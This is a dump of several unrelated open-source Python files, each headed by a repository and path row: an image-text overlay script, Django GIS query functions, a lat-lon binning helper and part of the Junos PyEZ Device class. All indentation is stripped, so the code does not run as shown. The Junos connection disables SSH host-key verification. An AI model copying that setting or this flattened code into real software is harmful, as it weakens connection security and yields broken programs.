| awsdocs/aws-doc-sdk-examples | python/cross_service/aurora_rest_lending_library/library_api/test/test_library_api_app.py | Python | apache-2.0 | 4,526 |
#!/usr/bin/env python
from PIL import Image, ImageDraw, ImageFont, ImageEnhance
import re
import sys
import argparse
import os.path
##
## @brief Recreates an image with code/text as pixels
##
## @param img The image
## @param text The text
## @param font The font
## @param fontSize The font size
##
## @return the altered image
##
def textOverlayInverse(img, text, font = "default", fontSize = 10):
front = Image.new('RGBA', img.size)
out = Image.new('RGBA', img.size, (255,255,255,0))
draw = ImageDraw.Draw(front)
if (font == "default"):
font = ImageFont.load_default()
else:
font = ImageFont.truetype(font, fontSize)
# determining the size of the font...
sentence = "The quick brown fox jumps over the lazy dog"
font_w, font_h = font.getsize(sentence)
font_w = font_w / len(sentence) # to get the approximate average width of the text
nRowChars = img.size[0] / font_w + 1
y_text = 0
a, img_height = img.size
textTmp = text
while y_text < img_height:
draw.text((0, y_text), textTmp[1:nRowChars], font = font)
textTmp = textTmp[nRowChars + 1:]
if (len(textTmp) <= nRowChars):
textTmp += text # repeat the characters if necessary
y_text += font_h
mask = ImageEnhance.Brightness(front).enhance(0)
out.paste(img, (0,0), mask)
return out
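##
## A minimal direct-call sketch (hypothetical file names, bypassing the CLI in
## main() below):
##
##   img = Image.open("background.png")
##   out = textOverlayInverse(img, "some source code to draw", fontSize = 12)
##   out.save("coded.png")
##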
##
## @brief Main Function
##
## @param argv The argv
##
## @return
##
def main(argv):
parser = argparse.ArgumentParser(description = "imageCoder 0.1 (February 2017) by Author: David Zimmermann")
parser.add_argument("-i", "--imageFile", help = "input file for the background image", required = True)
parser.add_argument("-o", "--imageOut", help = "filename for the output image", required = True)
parser.add_argument("-t", "--textFile", help = "input file for the text/code", required = True)
parser.add_argument("-f", "--font", help = "fontname or font path to a truetype-font", required = False, default = "default")
parser.add_argument("-s", "--fontSize", help = "font size in pt", required = False, default = 10, type=int)
parser.add_argument("-w", "--width", help = "width of the output image", required = False, default = 1024, type=int)
parser.add_argument("-H", "--height", help = "height of the output image", required = False, default = 768, type=int)
args = parser.parse_args()
inFile = args.imageFile
outFile = args.imageOut
textFile = args.textFile
font = args.font
fontSize = args.fontSize
img_width = args.width
img_height = args.height
if (not inFile[-4:] == ".png"):
print("inFile has to be a .png-file")
sys.exit(2)
if (not os.path.isfile(inFile)):
print("Could not find file '%s'." % inFile)
sys.exit(2)
if (not os.path.isfile(textFile)):
print("Could not find file '%s'." % textFile)
sys.exit(2)
# load the text
text_file = open(textFile)
text = text_file.read()
text_file.close()
# clean the text
text = re.sub("\s+", " ", text)
text = re.sub("\n+", " ", text)
# load the image
img = Image.open(inFile)
img = img.resize((img_width, img_height), Image.ANTIALIAS)
# overlay the text
out = textOverlayInverse(img, text, font = font, fontSize = fontSize)
# save the text
out.save(outFile)
print("File saved to %s" % outFile)
if __name__ == "__main__":
main(sys.argv[1:])
| DavZim/imageCoder | imageCoder.py | Python | mit | 3,283 |
from decimal import Decimal
from django.contrib.gis.db.models.fields import GeometryField
from django.contrib.gis.db.models.sql import AreaField
from django.contrib.gis.measure import (
Area as AreaMeasure, Distance as DistanceMeasure,
)
from django.core.exceptions import FieldError
from django.db.models import FloatField, IntegerField, TextField
from django.db.models.expressions import Func, Value
from django.utils import six
NUMERIC_TYPES = six.integer_types + (float, Decimal)
class GeoFunc(Func):
function = None
output_field_class = None
geom_param_pos = 0
def __init__(self, *expressions, **extra):
if 'output_field' not in extra and self.output_field_class:
extra['output_field'] = self.output_field_class()
super(GeoFunc, self).__init__(*expressions, **extra)
@property
def name(self):
return self.__class__.__name__
@property
def srid(self):
expr = self.source_expressions[self.geom_param_pos]
if hasattr(expr, 'srid'):
return expr.srid
try:
return expr.field.srid
except (AttributeError, FieldError):
return None
def as_sql(self, compiler, connection):
if self.function is None:
self.function = connection.ops.spatial_function_name(self.name)
return super(GeoFunc, self).as_sql(compiler, connection)
def resolve_expression(self, *args, **kwargs):
res = super(GeoFunc, self).resolve_expression(*args, **kwargs)
base_srid = res.srid
if not base_srid:
raise TypeError("Geometry functions can only operate on geometric content.")
for pos, expr in enumerate(res.source_expressions[1:], start=1):
if isinstance(expr, GeomValue) and expr.srid != base_srid:
# Automatic SRID conversion so objects are comparable
res.source_expressions[pos] = Transform(expr, base_srid).resolve_expression(*args, **kwargs)
return res
def _handle_param(self, value, param_name='', check_types=None):
if not hasattr(value, 'resolve_expression'):
if check_types and not isinstance(value, check_types):
raise TypeError(
"The %s parameter has the wrong type: should be %s." % (
param_name, str(check_types))
)
return value
class GeomValue(Value):
geography = False
@property
def srid(self):
return self.value.srid
def as_sql(self, compiler, connection):
if self.geography:
self.value = connection.ops.Adapter(self.value, geography=self.geography)
else:
self.value = connection.ops.Adapter(self.value)
return super(GeomValue, self).as_sql(compiler, connection)
def as_mysql(self, compiler, connection):
return 'GeomFromText(%s)', [connection.ops.Adapter(self.value)]
def as_sqlite(self, compiler, connection):
return 'GeomFromText(%%s, %s)' % self.srid, [connection.ops.Adapter(self.value)]
def as_oracle(self, compiler, connection):
return 'SDO_GEOMETRY(%%s, %s)' % self.srid, [connection.ops.Adapter(self.value)]
class GeoFuncWithGeoParam(GeoFunc):
def __init__(self, expression, geom, *expressions, **extra):
if not hasattr(geom, 'srid') or not geom.srid:
raise ValueError("Please provide a geometry attribute with a defined SRID.")
super(GeoFuncWithGeoParam, self).__init__(expression, GeomValue(geom), *expressions, **extra)
class SQLiteDecimalToFloatMixin(object):
"""
By default, Decimal values are converted to str by the SQLite backend, which
is not accepted by the GIS functions that expect numeric values.
"""
def as_sqlite(self, compiler, connection):
for expr in self.get_source_expressions():
if hasattr(expr, 'value') and isinstance(expr.value, Decimal):
expr.value = float(expr.value)
return super(SQLiteDecimalToFloatMixin, self).as_sql(compiler, connection)
class OracleToleranceMixin(object):
tolerance = 0.05
def as_oracle(self, compiler, connection):
tol = self.extra.get('tolerance', self.tolerance)
self.template = "%%(function)s(%%(expressions)s, %s)" % tol
return super(OracleToleranceMixin, self).as_sql(compiler, connection)
class Area(OracleToleranceMixin, GeoFunc):
def as_sql(self, compiler, connection):
if connection.ops.geography:
# Geography fields support area calculation, returns square meters.
self.output_field = AreaField('sq_m')
elif not self.output_field.geodetic(connection):
# Getting the area units of the geographic field.
units = self.output_field.units_name(connection)
if units:
self.output_field = AreaField(
AreaMeasure.unit_attname(self.output_field.units_name(connection))
)
else:
self.output_field = FloatField()
else:
# TODO: Do we want to support raw number areas for geodetic fields?
raise NotImplementedError('Area on geodetic coordinate systems not supported.')
return super(Area, self).as_sql(compiler, connection)
def as_oracle(self, compiler, connection):
self.output_field = AreaField('sq_m') # Oracle returns area in units of meters.
return super(Area, self).as_oracle(compiler, connection)
class AsGeoJSON(GeoFunc):
output_field_class = TextField
def __init__(self, expression, bbox=False, crs=False, precision=8, **extra):
expressions = [expression]
if precision is not None:
expressions.append(self._handle_param(precision, 'precision', six.integer_types))
options = 0
if crs and bbox:
options = 3
elif bbox:
options = 1
elif crs:
options = 2
if options:
expressions.append(options)
super(AsGeoJSON, self).__init__(*expressions, **extra)
class AsGML(GeoFunc):
geom_param_pos = 1
output_field_class = TextField
def __init__(self, expression, version=2, precision=8, **extra):
expressions = [version, expression]
if precision is not None:
expressions.append(self._handle_param(precision, 'precision', six.integer_types))
super(AsGML, self).__init__(*expressions, **extra)
class AsKML(AsGML):
def as_sqlite(self, compiler, connection):
# No version parameter
self.source_expressions.pop(0)
return super(AsKML, self).as_sql(compiler, connection)
class AsSVG(GeoFunc):
output_field_class = TextField
def __init__(self, expression, relative=False, precision=8, **extra):
relative = relative if hasattr(relative, 'resolve_expression') else int(relative)
expressions = [
expression,
relative,
self._handle_param(precision, 'precision', six.integer_types),
]
super(AsSVG, self).__init__(*expressions, **extra)
class BoundingCircle(GeoFunc):
def __init__(self, expression, num_seg=48, **extra):
super(BoundingCircle, self).__init__(*[expression, num_seg], **extra)
class Centroid(OracleToleranceMixin, GeoFunc):
pass
class Difference(OracleToleranceMixin, GeoFuncWithGeoParam):
pass
class DistanceResultMixin(object):
def convert_value(self, value, expression, connection, context):
if value is None:
return None
geo_field = GeometryField(srid=self.srid) # Fake field to get SRID info
if geo_field.geodetic(connection):
dist_att = 'm'
else:
units = geo_field.units_name(connection)
if units:
dist_att = DistanceMeasure.unit_attname(units)
else:
dist_att = None
if dist_att:
return DistanceMeasure(**{dist_att: value})
return value
class Distance(DistanceResultMixin, OracleToleranceMixin, GeoFuncWithGeoParam):
output_field_class = FloatField
spheroid = None
def __init__(self, expr1, expr2, spheroid=None, **extra):
expressions = [expr1, expr2]
if spheroid is not None:
self.spheroid = spheroid
expressions += (self._handle_param(spheroid, 'spheroid', bool),)
super(Distance, self).__init__(*expressions, **extra)
def as_postgresql(self, compiler, connection):
geo_field = GeometryField(srid=self.srid) # Fake field to get SRID info
src_field = self.get_source_fields()[0]
geography = src_field.geography and self.srid == 4326
if geography:
# Set parameters as geography if base field is geography
for pos, expr in enumerate(
self.source_expressions[self.geom_param_pos + 1:], start=self.geom_param_pos + 1):
if isinstance(expr, GeomValue):
expr.geography = True
elif geo_field.geodetic(connection):
# Geometry fields with geodetic (lon/lat) coordinates need special distance functions
if self.spheroid:
self.function = 'ST_Distance_Spheroid' # More accurate, resource intensive
# Replace boolean param by the real spheroid of the base field
self.source_expressions[2] = Value(geo_field._spheroid)
else:
self.function = 'ST_Distance_Sphere'
return super(Distance, self).as_sql(compiler, connection)
def as_oracle(self, compiler, connection):
if self.spheroid:
self.source_expressions.pop(2)
return super(Distance, self).as_oracle(compiler, connection)
class Envelope(GeoFunc):
pass
class ForceRHR(GeoFunc):
pass
class GeoHash(GeoFunc):
output_field_class = TextField
def __init__(self, expression, precision=None, **extra):
expressions = [expression]
if precision is not None:
expressions.append(self._handle_param(precision, 'precision', six.integer_types))
super(GeoHash, self).__init__(*expressions, **extra)
class Intersection(OracleToleranceMixin, GeoFuncWithGeoParam):
pass
class Length(DistanceResultMixin, OracleToleranceMixin, GeoFunc):
output_field_class = FloatField
def __init__(self, expr1, spheroid=True, **extra):
self.spheroid = spheroid
super(Length, self).__init__(expr1, **extra)
def as_sql(self, compiler, connection):
geo_field = GeometryField(srid=self.srid) # Fake field to get SRID info
if geo_field.geodetic(connection) and not connection.features.supports_length_geodetic:
raise NotImplementedError("This backend doesn't support Length on geodetic fields")
return super(Length, self).as_sql(compiler, connection)
def as_postgresql(self, compiler, connection):
geo_field = GeometryField(srid=self.srid) # Fake field to get SRID info
src_field = self.get_source_fields()[0]
geography = src_field.geography and self.srid == 4326
if geography:
self.source_expressions.append(Value(self.spheroid))
elif geo_field.geodetic(connection):
# Geometry fields with geodetic (lon/lat) coordinates need length_spheroid
self.function = 'ST_Length_Spheroid'
self.source_expressions.append(Value(geo_field._spheroid))
else:
dim = min(f.dim for f in self.get_source_fields() if f)
if dim > 2:
self.function = connection.ops.length3d
return super(Length, self).as_sql(compiler, connection)
def as_sqlite(self, compiler, connection):
geo_field = GeometryField(srid=self.srid)
if geo_field.geodetic(connection):
if self.spheroid:
self.function = 'GeodesicLength'
else:
self.function = 'GreatCircleLength'
return super(Length, self).as_sql(compiler, connection)
class MemSize(GeoFunc):
output_field_class = IntegerField
class NumGeometries(GeoFunc):
output_field_class = IntegerField
class NumPoints(GeoFunc):
output_field_class = IntegerField
def as_sqlite(self, compiler, connection):
if self.source_expressions[self.geom_param_pos].output_field.geom_type != 'LINESTRING':
raise TypeError("Spatialite NumPoints can only operate on LineString content")
return super(NumPoints, self).as_sql(compiler, connection)
class Perimeter(DistanceResultMixin, OracleToleranceMixin, GeoFunc):
output_field_class = FloatField
def as_postgresql(self, compiler, connection):
dim = min(f.dim for f in self.get_source_fields())
if dim > 2:
self.function = connection.ops.perimeter3d
return super(Perimeter, self).as_sql(compiler, connection)
class PointOnSurface(OracleToleranceMixin, GeoFunc):
pass
class Reverse(GeoFunc):
pass
class Scale(SQLiteDecimalToFloatMixin, GeoFunc):
def __init__(self, expression, x, y, z=0.0, **extra):
expressions = [
expression,
self._handle_param(x, 'x', NUMERIC_TYPES),
self._handle_param(y, 'y', NUMERIC_TYPES),
]
if z != 0.0:
expressions.append(self._handle_param(z, 'z', NUMERIC_TYPES))
super(Scale, self).__init__(*expressions, **extra)
class SnapToGrid(SQLiteDecimalToFloatMixin, GeoFunc):
def __init__(self, expression, *args, **extra):
nargs = len(args)
expressions = [expression]
if nargs in (1, 2):
expressions.extend(
[self._handle_param(arg, '', NUMERIC_TYPES) for arg in args]
)
elif nargs == 4:
# Reverse origin and size param ordering
expressions.extend(
[self._handle_param(arg, '', NUMERIC_TYPES) for arg in args[2:]]
)
expressions.extend(
[self._handle_param(arg, '', NUMERIC_TYPES) for arg in args[0:2]]
)
else:
raise ValueError('Must provide 1, 2, or 4 arguments to `SnapToGrid`.')
super(SnapToGrid, self).__init__(*expressions, **extra)
class SymDifference(OracleToleranceMixin, GeoFuncWithGeoParam):
pass
class Transform(GeoFunc):
def __init__(self, expression, srid, **extra):
expressions = [
expression,
self._handle_param(srid, 'srid', six.integer_types),
]
super(Transform, self).__init__(*expressions, **extra)
@property
def srid(self):
# Make srid the resulting srid of the transformation
return self.source_expressions[self.geom_param_pos + 1].value
def convert_value(self, value, expression, connection, context):
value = super(Transform, self).convert_value(value, expression, connection, context)
if not connection.ops.postgis and not value.srid:
# Some backends do not set the srid on the returning geometry
value.srid = self.srid
return value
class Translate(Scale):
def as_sqlite(self, compiler, connection):
func_name = connection.ops.spatial_function_name(self.name)
if func_name == 'ST_Translate' and len(self.source_expressions) < 4:
# Always provide the z parameter for ST_Translate (Spatialite >= 3.1)
self.source_expressions.append(Value(0))
elif func_name == 'ShiftCoords' and len(self.source_expressions) > 3:
raise ValueError("This version of Spatialite doesn't support 3D")
return super(Translate, self).as_sqlite(compiler, connection)
class Union(OracleToleranceMixin, GeoFuncWithGeoParam):
pass
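# A minimal usage sketch (hypothetical model and field names; assumes a working
# GeoDjango setup): these classes back django.contrib.gis.db.models.functions
# and are normally used through queryset annotations, e.g.:
#
#     from django.contrib.gis.geos import Point
#     City.objects.annotate(d=Distance('location', Point(0, 0, srid=4326)))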
| whitehorse-io/encarnia | pyenv/lib/python2.7/site-packages/django/contrib/gis/db/models/functions.py | Python | mit | 15,760 |
import numpy as np
from scipy.io import netcdf_file
import bz2
import os
from fnmatch import fnmatch
from numba import jit
@jit
def binsum2D(data, i, j, Nx, Ny):
data_binned = np.zeros((Ny,Nx), dtype=data.dtype)
N = len(data)
for n in range(N):
data_binned[j[n],i[n]] += data[n]
return data_binned
class LatLonAggregator(object):
"""A class for aggregating L2 data into a gridded dataset."""
def __init__(self, dlon=1., dlat=1., lonlim=(-180,180), latlim=(-90,90)):
self.dlon = dlon
self.dlat = dlat
self.lonmin = lonlim[0]
self.lonmax = lonlim[1]
self.latmin = latlim[0]
self.latmax = latlim[1]
# define grids
self.lon = np.arange(self.lonmin, self.lonmax, dlon)
self.lat = np.arange(self.latmin, self.latmax, dlat)
self.Nx, self.Ny = len(self.lon), len(self.lat)
self.lonc = self.lon + self.dlon/2
self.latc = self.lat + self.dlat/2
def binsum(self, data, lon, lat):
"""Bin the data into the lat-lon grid.
Returns gridded dataset."""
i = np.digitize(lon.ravel(), self.lon)
j = np.digitize(lat.ravel(), self.lat)
return binsum2D(data.ravel(), i, j, self.Nx, self.Ny)
def zeros(self, dtype=np.dtype('f4')):
return np.zeros((self.Ny, self.Nx), dtype=dtype)
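# A minimal usage sketch (synthetic data, not part of the package):
#
#     agg = LatLonAggregator()                      # 1-degree global grid
#     lon = np.random.uniform(-180, 179, 10000)     # keep points inside the grid
#     lat = np.random.uniform(-90, 89, 10000)
#     data = np.ones_like(lon)
#     grid = agg.binsum(data, lon, lat)             # (Ny, Nx) array of per-cell sums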
| rabernat/satdatatools | satdatatools/aggregator.py | Python | mit | 1,349 |
# stdlib
import os
import types
import platform
import warnings
import traceback
# stdlib, in support of the 'probe' method
import socket
import datetime
import time
import json
# 3rd-party packages
from lxml import etree
from ncclient import manager as netconf_ssh
import ncclient.transport.errors as NcErrors
import ncclient.operations.errors as NcOpErrors
from ncclient.operations import RPCError
import paramiko
import jinja2
# local modules
from jnpr.junos.rpcmeta import _RpcMetaExec
from jnpr.junos import exception as EzErrors
from jnpr.junos.cfg import Resource
from jnpr.junos.facts import *
from jnpr.junos import jxml as JXML
from jnpr.junos.decorators import timeoutDecorator, normalizeDecorator
_MODULEPATH = os.path.dirname(__file__)
class _MyTemplateLoader(jinja2.BaseLoader):
"""
Create a jinja2 template loader class that can be used to
load templates from all over the filesystem, but defaults
to the CWD and the 'templates' directory of the module
"""
def __init__(self):
self.paths = ['.', os.path.join(_MODULEPATH, 'templates')]
def get_source(self, environment, template):
def _in_path(dir):
return os.path.exists(os.path.join(dir, template))
path = filter(_in_path, self.paths)
if not path:
raise jinja2.TemplateNotFound(template)
path = os.path.join(path[0], template)
mtime = os.path.getmtime(path)
with file(path) as f:
source = f.read().decode('utf-8')
return source, path, lambda: mtime == os.path.getmtime(path)
_Jinja2ldr = jinja2.Environment(loader=_MyTemplateLoader())
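# A minimal usage sketch (hypothetical template name): with the loader above,
# templates are resolved from the CWD first and then from the module's
# 'templates' directory, e.g.:
#
#     tmpl = _Jinja2ldr.get_template('some_rpc_template.xml')
#     print(tmpl.render(interface='ge-0/0/0'))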
class Device(object):
"""
Junos Device class.
:attr:`ON_JUNOS`:
**READ-ONLY** -
Auto-set to ``True`` when this code is running on a Junos device,
vs. running on a local-server remotely connecting to a device.
:attr:`auto_probe`:
When non-zero the call to :meth:`open` will probe for NETCONF
reachability before proceeding with the NETCONF session establishment.
If you want to enable this behavior by default, you could do the
following in your code::
from jnpr.junos import Device
# set all device open to auto-probe with timeout of 10 sec
Device.auto_probe = 10
dev = Device( ... )
dev.open() # this will probe before attempting NETCONF connect
"""
ON_JUNOS = platform.system().upper() == 'JUNOS'
auto_probe = 0 # default is no auto-probe
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
# ------------------------------------------------------------------------
# property: hostname
# ------------------------------------------------------------------------
@property
def hostname(self):
"""
:returns: the host-name of the Junos device.
"""
return self._hostname if (
self._hostname != 'localhost') else self.facts.get('hostname')
# ------------------------------------------------------------------------
# property: user
# ------------------------------------------------------------------------
@property
def user(self):
"""
:returns: the login user (str) accessing the Junos device
"""
return self._auth_user
# ------------------------------------------------------------------------
# property: password
# ------------------------------------------------------------------------
@property
def password(self):
"""
:returns: ``None`` - do not provide the password
"""
return None # read-only
@password.setter
def password(self, value):
"""
Change the authentication password value. This is handy in case
the calling program needs to attempt different passwords.
"""
self._auth_password = value
# ------------------------------------------------------------------------
# property: logfile
# ------------------------------------------------------------------------
@property
def logfile(self):
"""
:returns: existing logfile ``file`` object.
"""
return self._logfile
@logfile.setter
def logfile(self, value):
"""
Assigns an opened file object to the device for logging
If there is an open logfile, and 'value' is ``None`` or ``False``
then close the existing file.
:param file value: An open ``file`` object.
:returns: the new logfile ``file`` object
:raises ValueError:
When **value** is not a ``file`` object
"""
# got an existing file that we need to close
if (not value) and (None != self._logfile):
rc = self._logfile.close()
self._logfile = False
return rc
if not isinstance(value, file):
raise ValueError("value must be a file object")
self._logfile = value
return self._logfile
# ------------------------------------------------------------------------
# property: timeout
# ------------------------------------------------------------------------
@property
def timeout(self):
"""
:returns: the current RPC timeout value (int) in seconds.
"""
return self._conn.timeout
@timeout.setter
def timeout(self, value):
"""
Used to change the RPC timeout value (default=30 sec).
:param int value:
New timeout value in seconds
"""
self._conn.timeout = value
# ------------------------------------------------------------------------
# property: facts
# ------------------------------------------------------------------------
@property
def facts(self):
"""
:returns: Device fact dictionary
"""
return self._facts
@facts.setter
def facts(self, value):
""" read-only property """
raise RuntimeError("facts is read-only!")
# ------------------------------------------------------------------------
# property: manages
# ------------------------------------------------------------------------
@property
def manages(self):
"""
:returns:
``list`` of Resource Managers/Utilities attached to this
instance using the :meth:`bind` method.
"""
return self._manages
# ------------------------------------------------------------------------
# property: transform
# ------------------------------------------------------------------------
@property
def transform(self):
"""
:returns: the current RPC XML Transformation.
"""
return self._conn._device_handler.transform_reply
@transform.setter
def transform(self, func):
"""
Used to change the RPC XML Transformation.
        :param lambda func:
New transform lambda
"""
self._conn._device_handler.transform_reply = func
# -----------------------------------------------------------------------
# OVERLOADS
# -----------------------------------------------------------------------
def __repr__(self):
return "Device(%s)" % self.hostname
# -----------------------------------------------------------------------
# CONSTRUCTOR
# -----------------------------------------------------------------------
def _sshconf_lkup(self):
if self._ssh_config:
sshconf_path = os.path.expanduser(self._ssh_config)
else:
home = os.getenv('HOME')
if not home:
return None
sshconf_path = os.path.join(os.getenv('HOME'), '.ssh/config')
if not os.path.exists(sshconf_path):
return None
else:
sshconf = paramiko.SSHConfig()
sshconf.parse(open(sshconf_path, 'r'))
found = sshconf.lookup(self._hostname)
self._hostname = found.get('hostname', self._hostname)
self._port = found.get('port', self._port)
self._conf_auth_user = found.get('user')
self._conf_ssh_private_key_file = found.get('identityfile')
return sshconf_path
def __init__(self, *vargs, **kvargs):
"""
Device object constructor.
:param str vargs[0]: host-name or ipaddress. This is an
alternative for **host**
:param str host:
**REQUIRED** host-name or ipaddress of target device
:param str user:
*OPTIONAL* login user-name, uses $USER if not provided
:param str passwd:
*OPTIONAL* if not provided, assumed ssh-keys are enforced
:param int port:
*OPTIONAL* NETCONF port (defaults to 830)
:param bool gather_facts:
*OPTIONAL* default is ``True``. If ``False`` then the
facts are not gathered on call to :meth:`open`
:param bool auto_probe:
*OPTIONAL* if non-zero then this enables auto_probe at time of
:meth:`open` and defines the amount of time(sec) for the
probe timeout
:param str ssh_private_key_file:
*OPTIONAL* The path to the SSH private key file.
This can be used if you need to provide a private key rather than
            loading the key into the ssh-key-ring/environment. If your
ssh-key requires a password, then you must provide it via
**passwd**
:param str ssh_config:
*OPTIONAL* The path to the SSH configuration file.
This can be used to load SSH information from a configuration file.
By default ~/.ssh/config is queried.
:param bool normalize:
*OPTIONAL* default is ``False``. If ``True`` then the
XML returned by :meth:`execute` will have whitespace normalized
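        A minimal usage sketch; the host, user and password values below are
        placeholders only::
            from jnpr.junos import Device
            dev = Device(host='192.0.2.1', user='lab', passwd='lab123')
            dev.open()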
"""
# ----------------------------------------
# setup instance connection/open variables
# ----------------------------------------
hostname = vargs[0] if len(vargs) else kvargs.get('host')
self._port = kvargs.get('port', 830)
self._gather_facts = kvargs.get('gather_facts', True)
self._normalize = kvargs.get('normalize', False)
self._auto_probe = kvargs.get('auto_probe', self.__class__.auto_probe)
if self.__class__.ON_JUNOS is True and hostname is None:
# ---------------------------------
# running on a Junos device locally
# ---------------------------------
self._auth_user = None
self._auth_password = None
self._hostname = 'localhost'
self._ssh_private_key_file = None
self._ssh_config = None
else:
# --------------------------
# making a remote connection
# --------------------------
if hostname is None:
raise ValueError("You must provide the 'host' value")
self._hostname = hostname
# user will default to $USER
self._auth_user = os.getenv('USER')
self._conf_auth_user = None
self._conf_ssh_private_key_file = None
# user can get updated by ssh_config
self._ssh_config = kvargs.get('ssh_config')
self._sshconf_path = self._sshconf_lkup()
            # but if user or private key is explicit in the call, then use it.
self._auth_user = kvargs.get('user') or self._conf_auth_user or self._auth_user
self._ssh_private_key_file = kvargs.get('ssh_private_key_file') or self._conf_ssh_private_key_file
self._auth_password = kvargs.get('password') or kvargs.get('passwd')
# -----------------------------
# initialize instance variables
# ------------------------------
self._conn = None
self._j2ldr = _Jinja2ldr
self._manages = []
self._facts = {}
# public attributes
self.connected = False
self.rpc = _RpcMetaExec(self)
# -----------------------------------------------------------------------
# Basic device methods
# -----------------------------------------------------------------------
def open(self, *vargs, **kvargs):
"""
Opens a connection to the device using existing login/auth
information.
:param bool gather_facts:
If set to ``True``/``False`` will override the device
instance value for only this open process
:param bool auto_probe:
If non-zero then this enables auto_probe and defines the amount
of time/seconds for the probe timeout
:param bool normalize:
If set to ``True``/``False`` will override the device
instance value for only this open process
:returns Device: Device instance (*self*).
:raises ProbeError:
When **auto_probe** is ``True`` and the probe activity
exceeds the timeout
:raises ConnectAuthError:
When provided authentication credentials fail to login
:raises ConnectRefusedError:
When the device does not have NETCONF enabled
:raises ConnectTimeoutError:
When the the :meth:`Device.timeout` value is exceeded
during the attempt to connect to the remote device
:raises ConnectError:
When an error, other than the above, occurs. The
originating ``Exception`` is assigned as ``err._orig``
and re-raised to the caller.
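        For example, to probe for reachability and skip fact gathering for
        this open only (the values shown are illustrative)::
            dev.open(auto_probe=10, gather_facts=False)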
"""
auto_probe = kvargs.get('auto_probe', self._auto_probe)
        if auto_probe != 0:
if not self.probe(auto_probe):
raise EzErrors.ProbeError(self)
try:
ts_start = datetime.datetime.now()
# we want to enable the ssh-agent if-and-only-if we are
# not given a password or an ssh key file.
# in this condition it means we want to query the agent
# for available ssh keys
allow_agent = bool((self._auth_password is None) and
(self._ssh_private_key_file is None))
# open connection using ncclient transport
self._conn = netconf_ssh.connect(
host=self._hostname,
port=self._port,
username=self._auth_user,
password=self._auth_password,
hostkey_verify=False,
key_filename=self._ssh_private_key_file,
allow_agent=allow_agent,
ssh_config=self._sshconf_lkup(),
device_params={'name': 'junos'})
except NcErrors.AuthenticationError as err:
# bad authentication credentials
raise EzErrors.ConnectAuthError(self)
except NcErrors.SSHError as err:
# this is a bit of a hack for now, since we want to
# know if the connection was refused or we simply could
# not open a connection due to reachability. so using
# a timestamp to differentiate the two conditions for now
# if the diff is < 3 sec, then assume the host is
            # reachable, but the NETCONF connection is refused.
ts_err = datetime.datetime.now()
diff_ts = ts_err - ts_start
if diff_ts.seconds < 3:
raise EzErrors.ConnectRefusedError(self)
# at this point, we assume that the connection
            # has timed out due to ip-reachability issues
if str(err).find('not open') > 0:
raise EzErrors.ConnectTimeoutError(self)
else:
# otherwise raise a generic connection
# error for now. tag the new exception
# with the original for debug
cnx = EzErrors.ConnectError(self)
cnx._orig = err
raise cnx
except socket.gaierror:
# invalid DNS name, so unreachable
raise EzErrors.ConnectUnknownHostError(self)
except Exception as err:
# anything else, we will re-raise as a
# generic ConnectError
cnx_err = EzErrors.ConnectError(self)
cnx_err._orig = err
raise cnx_err
self.connected = True
self._nc_transform = self.transform
self._norm_transform = lambda: JXML.normalize_xslt
normalize = kvargs.get('normalize', self._normalize)
if normalize is True:
self.transform = self._norm_transform
gather_facts = kvargs.get('gather_facts', self._gather_facts)
if gather_facts is True:
self.facts_refresh()
return self
def close(self):
"""
Closes the connection to the device.
"""
self._conn.close_session()
self.connected = False
@normalizeDecorator
@timeoutDecorator
def execute(self, rpc_cmd, **kvargs):
"""
Executes an XML RPC and returns results as either XML or native python
:param rpc_cmd:
can either be an XML Element or xml-as-string. In either case
the command starts with the specific command element, i.e., not the
<rpc> element itself
        :param func to_py:
            A caller-provided function that takes the response and
            will convert the results to native python types. All kvargs
will be passed to this function as well in the form::
to_py( self, rpc_rsp, **kvargs )
:raises ValueError:
When the **rpc_cmd** is of unknown origin
:raises PermissionError:
When the requested RPC command is not allowed due to
user-auth class privilege controls on Junos
:raises RpcError:
When an ``rpc-error`` element is contained in the RPC-reply
:returns:
RPC-reply as XML object. If **to_py** is provided, then
that function is called, and return of that function is
provided back to the caller; presumably to convert the XML to
native python data-types (e.g. ``dict``).
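        A hedged sketch of a **to_py** callback (the names used are
        illustrative only)::
            def as_dict(dev, rpc_rsp, **kvargs):
                return dict((e.tag, e.text) for e in rpc_rsp)
            reply = dev.execute('<get-software-information/>', to_py=as_dict)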
"""
if self.connected is not True:
raise EzErrors.ConnectClosedError(self)
if isinstance(rpc_cmd, str):
rpc_cmd_e = etree.XML(rpc_cmd)
elif isinstance(rpc_cmd, etree._Element):
rpc_cmd_e = rpc_cmd
else:
raise ValueError(
"Dont know what to do with rpc of type %s" %
rpc_cmd.__class__.__name__)
# invoking a bad RPC will cause a connection object exception
        # that will be raised directly to the caller ... for now ...
# @@@ need to trap this and re-raise accordingly.
try:
rpc_rsp_e = self._conn.rpc(rpc_cmd_e)._NCElement__doc
except NcOpErrors.TimeoutExpiredError:
# err is a TimeoutExpiredError from ncclient,
# which has no such attribute as xml.
raise EzErrors.RpcTimeoutError(self, rpc_cmd_e.tag, self.timeout)
except NcErrors.TransportError:
raise EzErrors.ConnectClosedError(self)
except RPCError as err:
rsp = JXML.remove_namespaces(err.xml)
# see if this is a permission error
e = EzErrors.PermissionError if rsp.findtext('error-message') == 'permission denied' else EzErrors.RpcError
raise e(cmd=rpc_cmd_e, rsp=rsp, errs=err)
# Something unexpected happened - raise it up
except Exception as err:
            warnings.warn("An unknown exception occurred - please report.", RuntimeWarning)
raise
# From 14.2 onward, junos supports JSON, so now code can be written as
# dev.rpc.get_route_engine_information({'format': 'json'})
if rpc_cmd_e.attrib.get('format') in ['json', 'JSON']:
if self._facts == {}:
self.facts_refresh()
ver_info = self._facts['version_info']
if ver_info.major[0] >= 15 or \
(ver_info.major[0] == 14 and ver_info.major[1] >= 2):
return json.loads(rpc_rsp_e.text)
else:
warnings.warn("Native JSON support is only from 14.2 onwards",
RuntimeWarning)
# This section is here for the possible use of something other than ncclient
# for RPCs that have embedded rpc-errors, need to check for those now
# rpc_errs = rpc_rsp_e.xpath('.//rpc-error')
# if len(rpc_errs):
# raise EzErrors.RpcError(cmd=rpc_cmd_e, rsp=rpc_errs[0])
# skip the <rpc-reply> element and pass the caller first child element
# generally speaking this is what they really want. If they want to
# uplevel they can always call the getparent() method on it.
try:
ret_rpc_rsp = rpc_rsp_e[0]
except IndexError:
# no children, so assume it means we are OK
return True
# if the caller provided a "to Python" conversion function, then invoke
# that now and return the results of that function. otherwise just
# return the RPC results as XML
if kvargs.get('to_py'):
return kvargs['to_py'](self, ret_rpc_rsp, **kvargs)
else:
return ret_rpc_rsp
